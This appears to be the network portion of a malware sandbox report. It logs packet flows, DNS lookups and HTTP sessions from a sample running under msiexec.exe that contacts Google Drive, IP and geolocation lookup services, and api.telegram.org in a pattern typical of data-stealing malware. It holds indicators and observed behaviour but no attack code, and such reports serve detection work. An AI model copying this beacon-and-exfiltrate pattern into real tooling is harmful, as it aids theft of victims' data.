                                                                                                            Nov 25, 2024 13:48:05.518408060 CET49940443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:05.518462896 CET44349940149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:05.518538952 CET49940443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:05.518919945 CET49940443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:05.518939972 CET44349940149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:05.560966015 CET4993580192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:07.004439116 CET44349940149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:07.006181002 CET49940443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:07.006220102 CET44349940149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:07.006278992 CET49940443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:07.006289959 CET44349940149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:07.632683992 CET44349940149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:07.632757902 CET44349940149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:07.632826090 CET49940443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:07.633213997 CET49940443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:07.635771990 CET4993580192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:07.637032032 CET4994580192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:07.756242037 CET8049935193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:07.756411076 CET4993580192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:07.757092953 CET8049945193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:07.757170916 CET4994580192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:07.757415056 CET4994580192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:07.878997087 CET8049945193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:08.902054071 CET8049945193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:08.903641939 CET49947443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:08.903732061 CET44349947149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:08.903819084 CET49947443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:08.904201984 CET49947443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:08.904212952 CET44349947149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:08.951678991 CET4994580192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:10.265465021 CET44349947149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:10.267432928 CET49947443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:10.267456055 CET44349947149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:10.267510891 CET49947443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:10.267520905 CET44349947149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:10.896081924 CET44349947149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:10.896176100 CET44349947149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:10.896239996 CET49947443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:10.896702051 CET49947443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:10.899530888 CET4994580192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:10.900650024 CET4995380192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:11.021378040 CET8049945193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:11.021533966 CET4994580192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:11.021745920 CET8049953193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:11.021835089 CET4995380192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:11.022012949 CET4995380192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:11.142874002 CET8049953193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:12.164453983 CET8049953193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:12.165617943 CET49958443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:12.165668964 CET44349958149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:12.165740013 CET49958443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:12.166007996 CET49958443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:12.166023016 CET44349958149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:12.217242002 CET4995380192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:13.530049086 CET44349958149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:13.532098055 CET49958443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:13.532125950 CET44349958149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:13.532183886 CET49958443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:13.532191038 CET44349958149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:14.213813066 CET44349958149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:14.213918924 CET44349958149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:14.213984966 CET49958443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:14.214317083 CET49958443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:14.217001915 CET4995380192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:14.218148947 CET4996280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:14.337317944 CET8049953193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:14.337460041 CET4995380192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:14.338125944 CET8049962193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:14.338195086 CET4996280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:14.338361025 CET4996280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:14.458287954 CET8049962193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:15.517761946 CET8049962193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:15.519275904 CET49966443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:15.519341946 CET44349966149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:15.519433022 CET49966443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:15.519697905 CET49966443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:15.519711971 CET44349966149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:15.560982943 CET4996280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:16.945663929 CET44349966149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:16.947531939 CET49966443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:16.947613955 CET44349966149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:16.947712898 CET49966443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:16.947726011 CET44349966149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:17.661823034 CET44349966149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:17.661917925 CET44349966149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:17.661993027 CET49966443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:17.662384987 CET49966443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:17.665170908 CET4996280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:17.666295052 CET4997280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:17.786362886 CET8049962193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:17.786508083 CET4996280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:17.787961960 CET8049972193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:17.788049936 CET4997280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:17.788270950 CET4997280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:17.910583973 CET8049972193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:18.932955980 CET8049972193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:18.934159040 CET49977443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:18.934181929 CET44349977149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:18.934236050 CET49977443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:18.934475899 CET49977443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:18.934489012 CET44349977149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:18.982876062 CET4997280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:20.354365110 CET44349977149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:20.356556892 CET49977443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:20.356585026 CET44349977149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:20.357429028 CET49977443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:20.357435942 CET44349977149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:21.001475096 CET44349977149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:21.001564026 CET44349977149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:21.001627922 CET49977443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:21.002124071 CET49977443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:21.005472898 CET4997280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:21.006654024 CET4998280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:21.127327919 CET8049972193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:21.127413988 CET4997280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:21.127973080 CET8049982193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:21.128058910 CET4998280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:21.128218889 CET4998280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:21.251502991 CET8049982193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:22.273792982 CET8049982193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:22.291867018 CET49985443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:22.291920900 CET44349985149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:22.292002916 CET49985443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:22.296211958 CET49985443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:22.296225071 CET44349985149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:22.326652050 CET4998280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:23.665034056 CET44349985149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:23.666784048 CET49985443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:23.666810036 CET44349985149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:23.666865110 CET49985443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:23.666873932 CET44349985149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:24.453367949 CET44349985149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:24.453536987 CET44349985149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:24.453625917 CET49985443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:24.454114914 CET49985443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:24.457192898 CET4998280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:24.458374023 CET4999180192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:24.577975988 CET8049982193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:24.578058004 CET4998280192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:24.578597069 CET8049991193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:24.578668118 CET4999180192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:24.586792946 CET4999180192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:24.711671114 CET8049991193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:25.785875082 CET8049991193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:25.787189960 CET49996443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:25.787245035 CET44349996149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:25.787322998 CET49996443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:25.787611961 CET49996443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:25.787625074 CET44349996149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:25.826672077 CET4999180192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:27.152868032 CET44349996149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:27.154448032 CET49996443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:27.154480934 CET44349996149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:27.154547930 CET49996443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:27.154556990 CET44349996149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:27.885844946 CET44349996149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:27.886099100 CET44349996149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:27.886169910 CET49996443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:27.886533022 CET49996443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:27.889625072 CET4999180192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:27.890520096 CET5000080192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:28.015860081 CET8049991193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:28.015923977 CET4999180192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:28.016344070 CET8050000193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:28.016408920 CET5000080192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:28.016746998 CET5000080192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:28.142776012 CET8050000193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:29.166765928 CET8050000193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:29.168332100 CET50004443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:29.168376923 CET44350004149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:29.168433905 CET50004443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:29.168741941 CET50004443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:29.168751001 CET44350004149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:29.217283010 CET5000080192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:30.854113102 CET44350004149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:30.872756958 CET50004443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:30.872792006 CET44350004149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:30.872840881 CET50004443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:30.872848034 CET44350004149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:31.633845091 CET44350004149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:31.635320902 CET44350004149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:31.635370970 CET50004443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:31.635720015 CET50004443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:31.638657093 CET5000080192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:31.639926910 CET5000980192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:31.759044886 CET8050000193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:31.759150982 CET5000080192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:31.759818077 CET8050009193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:31.759898901 CET5000980192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:31.760080099 CET5000980192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:31.883611917 CET8050009193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:32.912528038 CET8050009193.122.130.0192.168.2.9
                                                                                                            Nov 25, 2024 13:48:32.951646090 CET5000980192.168.2.9193.122.130.0
                                                                                                            Nov 25, 2024 13:48:34.743895054 CET50010443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:34.743953943 CET44350010149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:34.744020939 CET50010443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:34.744303942 CET50010443192.168.2.9149.154.167.220
                                                                                                            Nov 25, 2024 13:48:34.744324923 CET44350010149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:36.151259899 CET44350010149.154.167.220192.168.2.9
                                                                                                            Nov 25, 2024 13:48:36.201663017 CET50010443192.168.2.9149.154.167.220
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 25, 2024 13:47:28.319642067 CET6372053192.168.2.91.1.1.1
                                                                                                            Nov 25, 2024 13:47:28.457119942 CET53637201.1.1.1192.168.2.9
                                                                                                            Nov 25, 2024 13:47:31.114120960 CET5667553192.168.2.91.1.1.1
                                                                                                            Nov 25, 2024 13:47:31.361630917 CET53566751.1.1.1192.168.2.9
                                                                                                            Nov 25, 2024 13:47:36.470797062 CET5522753192.168.2.91.1.1.1
                                                                                                            Nov 25, 2024 13:47:36.609015942 CET53552271.1.1.1192.168.2.9
                                                                                                            Nov 25, 2024 13:47:38.525110006 CET5147253192.168.2.91.1.1.1
                                                                                                            Nov 25, 2024 13:47:38.666774988 CET53514721.1.1.1192.168.2.9
                                                                                                            Nov 25, 2024 13:47:40.843432903 CET5673753192.168.2.91.1.1.1
                                                                                                            Nov 25, 2024 13:47:40.982677937 CET53567371.1.1.1192.168.2.9
                                                                                                            Nov 25, 2024 13:47:44.583515882 CET4926453192.168.2.91.1.1.1
                                                                                                            Nov 25, 2024 13:47:44.722060919 CET53492641.1.1.1192.168.2.9
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Nov 25, 2024 13:47:28.319642067 CET192.168.2.91.1.1.10xb0ecStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:31.114120960 CET192.168.2.91.1.1.10x2faStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:36.470797062 CET192.168.2.91.1.1.10x2bd0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:38.525110006 CET192.168.2.91.1.1.10x315cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:40.843432903 CET192.168.2.91.1.1.10x37d6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:44.583515882 CET192.168.2.91.1.1.10x1140Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Nov 25, 2024 13:46:26.219363928 CET1.1.1.1192.168.2.90xa04fNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:46:26.219363928 CET1.1.1.1192.168.2.90xa04fNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:28.457119942 CET1.1.1.1192.168.2.90xb0ecNo error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:31.361630917 CET1.1.1.1192.168.2.90x2faNo error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:36.609015942 CET1.1.1.1192.168.2.90x2bd0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:36.609015942 CET1.1.1.1192.168.2.90x2bd0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:36.609015942 CET1.1.1.1192.168.2.90x2bd0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:36.609015942 CET1.1.1.1192.168.2.90x2bd0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:36.609015942 CET1.1.1.1192.168.2.90x2bd0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:36.609015942 CET1.1.1.1192.168.2.90x2bd0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:38.666774988 CET1.1.1.1192.168.2.90x315cNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:38.666774988 CET1.1.1.1192.168.2.90x315cNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:40.982677937 CET1.1.1.1192.168.2.90x37d6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                            Nov 25, 2024 13:47:44.722060919 CET1.1.1.1192.168.2.90x1140No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                            • drive.google.com
                                                                                                            • drive.usercontent.google.com
                                                                                                            • reallyfreegeoip.org
                                                                                                            • api.telegram.org
                                                                                                            • checkip.dyndns.org
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.949859193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:47:36.736192942 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:47:37.927936077 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:47:37 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 709a846a313e38a74b01518aa3e41fd2
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                            Nov 25, 2024 13:47:37.931982994 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Nov 25, 2024 13:47:38.271902084 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:47:38 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 6b54375dd2e30e8460b4692aeff83682
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                            Nov 25, 2024 13:47:40.501069069 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Nov 25, 2024 13:47:40.839667082 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:47:40 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: cbac6c02ab9faf2cef5e36988495ef94
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.949877193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:47:43.433701992 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Nov 25, 2024 13:47:44.581835985 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:47:44 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 68867a8225eb31632d59a327f7a710e4
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.949885193.122.130.0806492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 25, 2024 13:47:47.024539948 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 25, 2024 13:47:48.429419041 CET320INHTTP/1.1 200 OK
